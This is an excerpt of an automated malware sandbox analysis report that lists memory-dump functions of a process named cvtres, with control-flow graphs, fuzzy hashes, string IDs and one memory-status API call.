6a55c76-6a55c79 1776->1778 1782 6a55c87-6a55c8a 1778->1782 1783 6a55c7b-6a55c82 1778->1783 1780->1771 1785 6a55c8c-6a55c9d 1782->1785 1786 6a55ca8-6a55caa 1782->1786 1783->1782 1784->1775 1785->1766 1793 6a55ca3 1785->1793 1788 6a55cb1-6a55cb4 1786->1788 1789 6a55cac 1786->1789 1788->1723 1791 6a55cba-6a55cc3 1788->1791 1789->1788 1793->1786 1813 6a55b3d-6a55b70 1812->1813 1814 6a55beb-6a55bf2 1812->1814 1825 6a55b75-6a55bb6 1813->1825 1826 6a55b72 1813->1826 1814->1811 1815 6a55bf4-6a55c27 1814->1815 1827 6a55c2c-6a55c59 1815->1827 1828 6a55c29 1815->1828 1836 6a55bce-6a55bd5 1825->1836 1837 6a55bb8-6a55bc9 1825->1837 1826->1825 1827->1791 1828->1827 1839 6a55bdd-6a55bdf 1836->1839 1837->1791 1839->1791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 6d1d0e2554cb4aebcc31b0c5d849514e12ba390f89039966ee2fb97a03a67c81
                                                          • Instruction ID: 88eb5b7ee176975ffcfc059a56dd7b0e1eedb4719e89208f63a10f91e8f90b14
                                                          • Opcode Fuzzy Hash: 6d1d0e2554cb4aebcc31b0c5d849514e12ba390f89039966ee2fb97a03a67c81
                                                          • Instruction Fuzzy Hash: A522CF75F002159FDF64EBA4C5806AEBBB2FF89320F258469D806AB394DB35DC41CB91
                                                          Function 06A52351 Relevance: 1.0, Instructions: 995COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90f39b727437182d7c9f5f4095f104d3b00641ba757aa2ccd8e6c17378f802d4
                                                          • Instruction ID: bd09d87c61e6ec1ee38abae1707f88185664a8b6104258b97eeeaf696f229f78
                                                          • Opcode Fuzzy Hash: 90f39b727437182d7c9f5f4095f104d3b00641ba757aa2ccd8e6c17378f802d4
                                                          • Instruction Fuzzy Hash: 8E922734A002048FDB64EB68C584B5DB7F2FF45314F5688A9E84AAF365DB35ED85CB80
                                                          Function 06A565E0 Relevance: .8, Instructions: 823COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3fd16adcd9596a0a0cec5f66024e4d887ceb50aec30fc995a573419b6e260af
                                                          • Instruction ID: d4d1de601252a9b4a5288aeb1808344022363fe24a498af73ad5c727b0d26dcb
                                                          • Opcode Fuzzy Hash: b3fd16adcd9596a0a0cec5f66024e4d887ceb50aec30fc995a573419b6e260af
                                                          • Instruction Fuzzy Hash: 7762AE31B002159FDB64EB68D584BADB7F2EF84314F558869E80AEB364DB35EC45CB80
                                                          Function 06A5C178 Relevance: .6, Instructions: 646COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9d5496a96bb79e86c8d38b33342ef5f6eb41e66e0766a1e209bfd226e18629b
                                                          • Instruction ID: f6030cd7de1fb2662af83fb878fbca58ffcfa0301f3d78d33ea29dc9596c0932
                                                          • Opcode Fuzzy Hash: f9d5496a96bb79e86c8d38b33342ef5f6eb41e66e0766a1e209bfd226e18629b
                                                          • Instruction Fuzzy Hash: 66328335B002159FDB54EF68D580BADB7B2FB84320F518429E906EB359DB39EC42CB91
                                                          Function 06A5B210 Relevance: .6, Instructions: 571COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 224c82edc5908da3f4759b72096fe2dce2bce2204c98e293d24d55b9179961e7
                                                          • Instruction ID: daea7abd8764c38083dd4443189ee6ac4ae5ec5c0874f98e246f27f5d5c81798
                                                          • Opcode Fuzzy Hash: 224c82edc5908da3f4759b72096fe2dce2bce2204c98e293d24d55b9179961e7
                                                          • Instruction Fuzzy Hash: BE224170E102099FDF64EB58C5A07AEB7B2FB45311F218926E809EB791DB34DC81CB61
                                                          Function 06A5ACB8 Relevance: 10.4, Strings: 8, Instructions: 397COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 6a5acb8-6a5acd6 1 6a5acd8-6a5acdb 0->1 2 6a5acdd-6a5ace6 1->2 3 6a5aceb-6a5acee 1->3 2->3 4 6a5acf0-6a5acf9 3->4 5 6a5ad08-6a5ad0b 3->5 8 6a5aeef-6a5aef9 4->8 9 6a5acff-6a5ad03 4->9 6 6a5ad0d-6a5ad1a 5->6 7 6a5ad1f-6a5ad22 5->7 6->7 10 6a5ad24-6a5ad28 7->10 11 6a5ad33-6a5ad36 7->11 18 6a5ae98 8->18 19 6a5aefb-6a5af26 8->19 9->5 14 6a5aee4-6a5aeee 10->14 15 6a5ad2e 10->15 16 6a5ad50-6a5ad53 11->16 17 6a5ad38-6a5ad4b 11->17 15->11 20 6a5aed5-6a5aede 16->20 21 6a5ad59-6a5ad5c 16->21 17->16 23 6a5ae9a-6a5aecb 18->23 22 6a5af28-6a5af2b 19->22 20->4 20->14 25 6a5ad66-6a5ad69 21->25 26 6a5ad5e-6a5ad63 21->26 27 6a5af2d-6a5af31 22->27 28 6a5af38-6a5af3b 22->28 63 6a5aed2 23->63 29 6a5ad8c-6a5ad8e 25->29 30 6a5ad6b-6a5ad87 25->30 26->25 33 6a5af41-6a5af7c 27->33 34 6a5af33 27->34 28->33 35 6a5b1a4-6a5b1a7 28->35 31 6a5ad95-6a5ad98 29->31 32 6a5ad90 29->32 30->29 31->1 40 6a5ad9e-6a5adc2 31->40 32->31 50 6a5af82-6a5af8e 33->50 51 6a5b16f-6a5b182 33->51 34->28 37 6a5b1a9-6a5b1c5 35->37 38 6a5b1ca-6a5b1cd 35->38 37->38 41 6a5b1cf-6a5b1d9 38->41 42 6a5b1da-6a5b1dd 38->42 40->63 64 6a5adc8-6a5add7 40->64 47 6a5b1ec-6a5b1ee 42->47 48 6a5b1df call 6a5b210 42->48 53 6a5b1f5-6a5b1f8 47->53 54 6a5b1f0 47->54 57 6a5b1e5-6a5b1e7 48->57 65 6a5af90-6a5afa9 50->65 66 6a5afae-6a5aff2 50->66 52 6a5b184 51->52 62 6a5b185 52->62 53->22 60 6a5b1fe-6a5b208 53->60 54->53 57->47 62->62 63->20 70 6a5adef-6a5ae2a call 6a56590 64->70 71 6a5add9-6a5addf 64->71 65->52 83 6a5aff4-6a5b006 66->83 84 6a5b00e-6a5b04d 66->84 90 6a5ae42-6a5ae59 70->90 91 6a5ae2c-6a5ae32 70->91 73 6a5ade1 71->73 74 6a5ade3-6a5ade5 71->74 73->70 74->70 83->84 88 6a5b134-6a5b149 84->88 89 6a5b053-6a5b12e call 6a56590 84->89 88->51 89->88 101 6a5ae71-6a5ae82 90->101 102 6a5ae5b-6a5ae61 90->102 93 6a5ae34 91->93 94 6a5ae36-6a5ae38 91->94 93->90 94->90 101->23 107 6a5ae84-6a5ae8a 101->107 103 6a5ae65-6a5ae67 102->103 104 6a5ae63 102->104 103->101 104->101 109 6a5ae8c 107->109 110 6a5ae8e-6a5ae90 107->110 109->23 110->18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-3377385791
                                                          • Opcode ID: 10cd25cde24951c1f0df1e11d4c5899f96dcf09bad27d2e0224390193e736903
                                                          • Instruction ID: 4940f543b1ab433f5b3a2ddb8f4dacc21a8cf3a774b2c34abcbd36eebdb0fcaf
                                                          • Opcode Fuzzy Hash: 10cd25cde24951c1f0df1e11d4c5899f96dcf09bad27d2e0224390193e736903
                                                          • Instruction Fuzzy Hash: 43E17E31F102169FCB55EF68D9906AEB7F2FF85301F118A29E909AB354DB349C46CB90
                                                          Function 06A5B640 Relevance: 8.0, Strings: 6, Instructions: 472COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-2877684506
                                                          • Opcode ID: c44a37b8f0916956370baecb7728e34f2dff3135fecedfe65049000c9be702a2
                                                          • Instruction ID: 1f3553c172bf6bcd13bfda55b378df3cb9792e834c53d5c545bd9c447730b9be
                                                          • Opcode Fuzzy Hash: c44a37b8f0916956370baecb7728e34f2dff3135fecedfe65049000c9be702a2
                                                          • Instruction Fuzzy Hash: 63026070E102098FDB64EF68D4A06ADB7B2FB45312F12892AD815DF255DB34EC85CBA1
                                                          Function 06A59138 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 425 6a59138-6a5915d 426 6a5915f-6a59162 425->426 427 6a59a20-6a59a23 426->427 428 6a59168-6a5917d 426->428 429 6a59a25-6a59a44 427->429 430 6a59a49-6a59a4b 427->430 435 6a59195-6a591ab 428->435 436 6a5917f-6a59185 428->436 429->430 431 6a59a52-6a59a55 430->431 432 6a59a4d 430->432 431->426 434 6a59a5b-6a59a65 431->434 432->431 442 6a591b6-6a591b8 435->442 438 6a59187 436->438 439 6a59189-6a5918b 436->439 438->435 439->435 443 6a591d0-6a59241 442->443 444 6a591ba-6a591c0 442->444 455 6a59243-6a59266 443->455 456 6a5926d-6a59289 443->456 445 6a591c4-6a591c6 444->445 446 6a591c2 444->446 445->443 446->443 455->456 461 6a592b5-6a592d0 456->461 462 6a5928b-6a592ae 456->462 467 6a592d2-6a592f4 461->467 468 6a592fb-6a59316 461->468 462->461 467->468 473 6a59318-6a59334 468->473 474 6a5933b-6a59349 468->474 473->474 475 6a59359-6a593d3 474->475 476 6a5934b-6a59354 474->476 482 6a593d5-6a593f3 475->482 483 6a59420-6a59435 475->483 476->434 487 6a593f5-6a59404 482->487 488 6a5940f-6a5941e 482->488 483->427 487->488 488->482 488->483
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq
                                                          • API String ID: 0-2876200767
                                                          • Opcode ID: 7832038ab0fdb5f3ee3f8bc1eb80f1eeb2ae1a50a999d8385e26f11de1e30a4d
                                                          • Instruction ID: 098103a4fdeae18b4fa1c5816908edad61707e92a021bb304696b5dbfb3830f2
                                                          • Opcode Fuzzy Hash: 7832038ab0fdb5f3ee3f8bc1eb80f1eeb2ae1a50a999d8385e26f11de1e30a4d
                                                          • Instruction Fuzzy Hash: B0913D31F1061A9FDB54EF65D950BAFB3F6EB84200F148569C809EF384EB349D468B91
                                                          Function 06A5CF38 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 491 6a5cf38-6a5cf53 492 6a5cf55-6a5cf58 491->492 493 6a5cf7b-6a5cf7e 492->493 494 6a5cf5a-6a5cf76 492->494 495 6a5cfc7-6a5cfca 493->495 496 6a5cf80-6a5cfc2 493->496 494->493 498 6a5cfcc-6a5cfce 495->498 499 6a5cfd9-6a5cfdc 495->499 496->495 501 6a5cfd4 498->501 502 6a5d421 498->502 503 6a5d025-6a5d028 499->503 504 6a5cfde-6a5d020 499->504 501->499 505 6a5d424-6a5d430 502->505 506 6a5d071-6a5d074 503->506 507 6a5d02a-6a5d039 503->507 504->503 505->507 512 6a5d436-6a5d723 505->512 509 6a5d076-6a5d0b8 506->509 510 6a5d0bd-6a5d0c0 506->510 513 6a5d048-6a5d054 507->513 514 6a5d03b-6a5d040 507->514 509->510 516 6a5d0c2-6a5d0c7 510->516 517 6a5d0ca-6a5d0cd 510->517 703 6a5d729-6a5d72f 512->703 704 6a5d94a-6a5d954 512->704 518 6a5d955-6a5d98e 513->518 519 6a5d05a-6a5d06c 513->519 514->513 516->517 524 6a5d116-6a5d119 517->524 525 6a5d0cf-6a5d111 517->525 534 6a5d990-6a5d993 518->534 519->506 527 6a5d162-6a5d165 524->527 528 6a5d11b-6a5d15d 524->528 525->524 535 6a5d167-6a5d1a9 527->535 536 6a5d1ae-6a5d1b1 527->536 528->527 540 6a5d995-6a5d9b1 534->540 541 6a5d9b6-6a5d9b9 534->541 535->536 538 6a5d1b3-6a5d1c2 536->538 539 6a5d1fa-6a5d1fd 536->539 545 6a5d1c4-6a5d1c9 538->545 546 6a5d1d1-6a5d1dd 538->546 551 6a5d1ff-6a5d215 539->551 552 6a5d21a-6a5d21d 539->552 540->541 553 6a5d9c8-6a5d9cb 541->553 554 6a5d9bb call 6a5daad 541->554 545->546 546->518 557 6a5d1e3-6a5d1f5 546->557 551->552 559 6a5d22c-6a5d22f 552->559 560 6a5d21f-6a5d221 552->560 555 6a5d9cd-6a5d9f9 553->555 556 6a5d9fe-6a5da00 553->556 562 6a5d9c1-6a5d9c3 554->562 555->556 564 6a5da07-6a5da0a 556->564 565 6a5da02 556->565 557->539 559->505 571 6a5d235-6a5d238 559->571 569 6a5d227 560->569 570 6a5d2df-6a5d2e8 560->570 562->553 564->534 574 6a5da0c-6a5da1b 564->574 565->564 569->559 576 6a5d2f7-6a5d303 570->576 577 6a5d2ea-6a5d2ef 570->577 579 6a5d281-6a5d284 571->579 580 6a5d23a-6a5d27c 571->580 598 6a5da82-6a5da97 574->598 599 6a5da1d-6a5da80 call 6a56590 574->599 587 6a5d414-6a5d419 576->587 588 6a5d309-6a5d31d 576->588 577->576 582 6a5d286-6a5d2c8 579->582 583 6a5d2cd-6a5d2cf 579->583 580->579 582->583 592 6a5d2d6-6a5d2d9 583->592 593 6a5d2d1 583->593 587->502 588->502 605 6a5d323-6a5d335 588->605 592->492 592->570 593->592 599->598 618 6a5d337-6a5d33d 605->618 619 6a5d359-6a5d35b 605->619 620 6a5d341-6a5d34d 618->620 621 6a5d33f 618->621 622 6a5d365-6a5d371 619->622 627 6a5d34f-6a5d357 620->627 621->627 631 6a5d373-6a5d37d 622->631 632 6a5d37f 622->632 627->622 637 6a5d384-6a5d386 631->637 632->637 637->502 638 6a5d38c-6a5d3a8 call 6a56590 637->638 648 6a5d3b7-6a5d3c3 638->648 649 6a5d3aa-6a5d3af 638->649 648->587 650 6a5d3c5-6a5d412 648->650 649->648 650->502 705 6a5d731-6a5d736 703->705 706 6a5d73e-6a5d747 703->706 705->706 706->518 707 6a5d74d-6a5d760 706->707 709 6a5d766-6a5d76c 707->709 710 6a5d93a-6a5d944 707->710 711 6a5d76e-6a5d773 709->711 712 6a5d77b-6a5d784 709->712 710->703 710->704 711->712 712->518 713 6a5d78a-6a5d7ab 712->713 716 6a5d7ad-6a5d7b2 713->716 717 6a5d7ba-6a5d7c3 713->717 716->717 717->518 718 6a5d7c9-6a5d7e6 717->718 718->710 721 6a5d7ec-6a5d7f2 718->721 721->518 722 6a5d7f8-6a5d811 721->722 724 6a5d817-6a5d83e 722->724 725 6a5d92d-6a5d934 722->725 724->518 728 6a5d844-6a5d84e 724->728 725->710 725->721 728->518 729 6a5d854-6a5d86b 728->729 731 6a5d86d-6a5d878 729->731 732 6a5d87a-6a5d895 729->732 731->732 732->725 737 6a5d89b-6a5d8b4 call 6a56590 732->737 741 6a5d8b6-6a5d8bb 737->741 742 6a5d8c3-6a5d8cc 737->742 741->742 742->518 743 6a5d8d2-6a5d926 742->743 743->725
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq
                                                          • API String ID: 0-2085107096
                                                          • Opcode ID: c071d52af0ebfedd4ead45ede9479020e84208d41912001536f0900da628dea4
                                                          • Instruction ID: 0e46a6f7403b2d7fe9c4c25e45942179fe6cf0c3a1eb840c43ef275e0748a003
                                                          • Opcode Fuzzy Hash: c071d52af0ebfedd4ead45ede9479020e84208d41912001536f0900da628dea4
                                                          • Instruction Fuzzy Hash: 3E624B70A003168FCB55EF68D590A5EB7F2FF84301B618A68D4099F369DB75ED86CB80
                                                          Function 06A54B60 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 751 6a54b60-6a54b84 752 6a54b86-6a54b89 751->752 753 6a54b8b-6a54ba5 752->753 754 6a54baa-6a54bad 752->754 753->754 755 6a54bb3-6a54cab 754->755 756 6a5528c-6a5528e 754->756 774 6a54cb1-6a54cfe call 6a55409 755->774 775 6a54d2e-6a54d35 755->775 757 6a55295-6a55298 756->757 758 6a55290 756->758 757->752 760 6a5529e-6a552ab 757->760 758->757 788 6a54d04-6a54d20 774->788 776 6a54db9-6a54dc2 775->776 777 6a54d3b-6a54dab 775->777 776->760 794 6a54db6 777->794 795 6a54dad 777->795 791 6a54d22 788->791 792 6a54d2b 788->792 791->792 792->775 794->776 795->794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fhq$XPhq$\Ohq
                                                          • API String ID: 0-1165799323
                                                          • Opcode ID: 99a3d033beed08f474818a513bf0a3eafc02673c454e0b65001264ace234d4e1
                                                          • Instruction ID: 1e4e2409ffe47a62c94ab8777bc3c71a81b05dc431efa4160b4fb6e9ed468646
                                                          • Opcode Fuzzy Hash: 99a3d033beed08f474818a513bf0a3eafc02673c454e0b65001264ace234d4e1
                                                          • Instruction Fuzzy Hash: 13617F71F002099FEB54EFA5C8587AEBBF6FF88300F208429D506AB395DB759C458B91
                                                          Function 06A5912D Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1513 6a5912d-6a5915d 1514 6a5915f-6a59162 1513->1514 1515 6a59a20-6a59a23 1514->1515 1516 6a59168-6a5917d 1514->1516 1517 6a59a25-6a59a44 1515->1517 1518 6a59a49-6a59a4b 1515->1518 1523 6a59195-6a591ab 1516->1523 1524 6a5917f-6a59185 1516->1524 1517->1518 1519 6a59a52-6a59a55 1518->1519 1520 6a59a4d 1518->1520 1519->1514 1522 6a59a5b-6a59a65 1519->1522 1520->1519 1530 6a591b6-6a591b8 1523->1530 1526 6a59187 1524->1526 1527 6a59189-6a5918b 1524->1527 1526->1523 1527->1523 1531 6a591d0-6a59241 1530->1531 1532 6a591ba-6a591c0 1530->1532 1543 6a59243-6a59266 1531->1543 1544 6a5926d-6a59289 1531->1544 1533 6a591c4-6a591c6 1532->1533 1534 6a591c2 1532->1534 1533->1531 1534->1531 1543->1544 1549 6a592b5-6a592d0 1544->1549 1550 6a5928b-6a592ae 1544->1550 1555 6a592d2-6a592f4 1549->1555 1556 6a592fb-6a59316 1549->1556 1550->1549 1555->1556 1561 6a59318-6a59334 1556->1561 1562 6a5933b-6a59349 1556->1562 1561->1562 1563 6a59359-6a593d3 1562->1563 1564 6a5934b-6a59354 1562->1564 1570 6a593d5-6a593f3 1563->1570 1571 6a59420-6a59435 1563->1571 1564->1522 1575 6a593f5-6a59404 1570->1575 1576 6a5940f-6a5941e 1570->1576 1571->1515 1575->1576 1576->1570 1576->1571
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq
                                                          • API String ID: 0-2695052418
                                                          • Opcode ID: a9f0e676c0e2f8c1a1a31f987fdea20f07e6ce5b2767df0b357e76379826f722
                                                          • Instruction ID: 1980767364cf73da880b92ac13519397ac767be7ade0162dd0a9f7bd0560d36b
                                                          • Opcode Fuzzy Hash: a9f0e676c0e2f8c1a1a31f987fdea20f07e6ce5b2767df0b357e76379826f722
                                                          • Instruction Fuzzy Hash: 3E515F31B006159BDB55EF79D950BAF73F6EB88210F148479C80AEB394EB34DC068B91
                                                          Function 06A54B50 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1615 6a54b50-6a54b84 1617 6a54b86-6a54b89 1615->1617 1618 6a54b8b-6a54ba5 1617->1618 1619 6a54baa-6a54bad 1617->1619 1618->1619 1620 6a54bb3-6a54cab 1619->1620 1621 6a5528c-6a5528e 1619->1621 1639 6a54cb1-6a54cfe call 6a55409 1620->1639 1640 6a54d2e-6a54d35 1620->1640 1622 6a55295-6a55298 1621->1622 1623 6a55290 1621->1623 1622->1617 1625 6a5529e-6a552ab 1622->1625 1623->1622 1653 6a54d04-6a54d20 1639->1653 1641 6a54db9-6a54dc2 1640->1641 1642 6a54d3b-6a54dab 1640->1642 1641->1625 1659 6a54db6 1642->1659 1660 6a54dad 1642->1660 1656 6a54d22 1653->1656 1657 6a54d2b 1653->1657 1656->1657 1657->1640 1659->1641 1660->1659
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fhq$XPhq
                                                          • API String ID: 0-3594109931
                                                          • Opcode ID: 2351ae195354590390bca4b97516642dd48d792d587c8db2f846c00acc2e5005
                                                          • Instruction ID: ea1be76a671e9349a595f730371db7df9f98c7362a432f0547cbe84141d5fa84
                                                          • Opcode Fuzzy Hash: 2351ae195354590390bca4b97516642dd48d792d587c8db2f846c00acc2e5005
                                                          • Instruction Fuzzy Hash: 4151B371F002099FDB54EFA5C854BAEBBF6FF88300F208529E105AB395DB759C458B91
                                                          Function 0136EBF8 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1944 136ebf8-136ec00 1945 136ec02-136ec13 1944->1945 1946 136ebbe-136ebc4 1944->1946 1947 136ec15-136ec3c 1945->1947 1948 136ec3d-136ec47 1945->1948 1946->1944 1950 136ec50-136ec55 call 136e7f8 1948->1950 1952 136ec5a-136ec5c 1950->1952 1953 136ec62-136ecc1 1952->1953 1954 136ec5e-136ec61 1952->1954 1961 136ecc7-136ed1e 1953->1961 1962 136ecc3-136ecc6 1953->1962 1965 136ed26-136ed54 GlobalMemoryStatusEx 1961->1965 1966 136ed56-136ed5c 1965->1966 1967 136ed5d-136ed85 1965->1967 1966->1967
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150547396.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1360000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dd15984f2b1cecaa8edb05bcdf3bcc64ca843aa602ae6ecbe78ea4a4d5b7981
                                                          • Instruction ID: 4db5708f146d5d7e0364b2464db9aebf3184b6297d696c5252a64f02fcaa8358
                                                          • Opcode Fuzzy Hash: 8dd15984f2b1cecaa8edb05bcdf3bcc64ca843aa602ae6ecbe78ea4a4d5b7981
                                                          • Instruction Fuzzy Hash: 17415471D043958FCB14CF79D8042AEBFF6EF89310F0585AAD544A7281DB389844CBE0
                                                          Function 0136ECE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1970 136ece0-136ed1e 1971 136ed26-136ed54 GlobalMemoryStatusEx 1970->1971 1972 136ed56-136ed5c 1971->1972 1973 136ed5d-136ed85 1971->1973 1972->1973
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 0136ED47
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150547396.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1360000_cvtres.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: fa84324fe896007d836673be1d3bab8831047cacad434c6a1ee998f69647573b
                                                          • Instruction ID: 9dcb5cb716fd3ec1937b290f2da35ba54e72ec488a0807a2c5b088d1ba6234ba
                                                          • Opcode Fuzzy Hash: fa84324fe896007d836673be1d3bab8831047cacad434c6a1ee998f69647573b
                                                          • Instruction Fuzzy Hash: 9F1123B5C006599FCB10DF9AC444BDEFBF4EF48320F15812AD918A7240D378A944CFA1
                                                          Function 06A5DAAD Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1976 6a5daad-6a5dad7 1977 6a5dad9-6a5dadc 1976->1977 1978 6a5daff-6a5db02 1977->1978 1979 6a5dade-6a5dafa 1977->1979 1980 6a5db04 1978->1980 1981 6a5db11-6a5db14 1978->1981 1979->1978 1985 6a5db0a-6a5db0c 1980->1985 1982 6a5db47-6a5db49 1981->1982 1983 6a5db16-6a5db42 1981->1983 1986 6a5db50-6a5db53 1982->1986 1987 6a5db4b 1982->1987 1983->1982 1985->1981 1986->1977 1989 6a5db55-6a5db64 1986->1989 1987->1986 1991 6a5dce9-6a5dd13 1989->1991 1992 6a5db6a-6a5dba3 1989->1992 1995 6a5dd14 1991->1995 1999 6a5dba5-6a5dbaf 1992->1999 2000 6a5dbf1-6a5dc15 1992->2000 1995->1995 2003 6a5dbc7-6a5dbef 1999->2003 2004 6a5dbb1-6a5dbb7 1999->2004 2006 6a5dc17 2000->2006 2007 6a5dc1f-6a5dce3 2000->2007 2003->1999 2003->2000 2008 6a5dbb9 2004->2008 2009 6a5dbbb-6a5dbbd 2004->2009 2006->2007 2007->1991 2007->1992 2008->2003 2009->2003
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHcq
                                                          • API String ID: 0-4245845256
                                                          • Opcode ID: 1df85644e00bf479e8101e45ddf561203dce1ca3ebb4a20b74602bd23fd3b91b
                                                          • Instruction ID: 2c5402887a11723b6073ed2d9fdcaddfde74aa617e65ae55478d8c2dc8708c1d
                                                          • Opcode Fuzzy Hash: 1df85644e00bf479e8101e45ddf561203dce1ca3ebb4a20b74602bd23fd3b91b
                                                          • Instruction Fuzzy Hash: 85419270E0030AAFDB65FFB5D4546AEBBB2FF85300F114929E805EB241DB74A946CB85
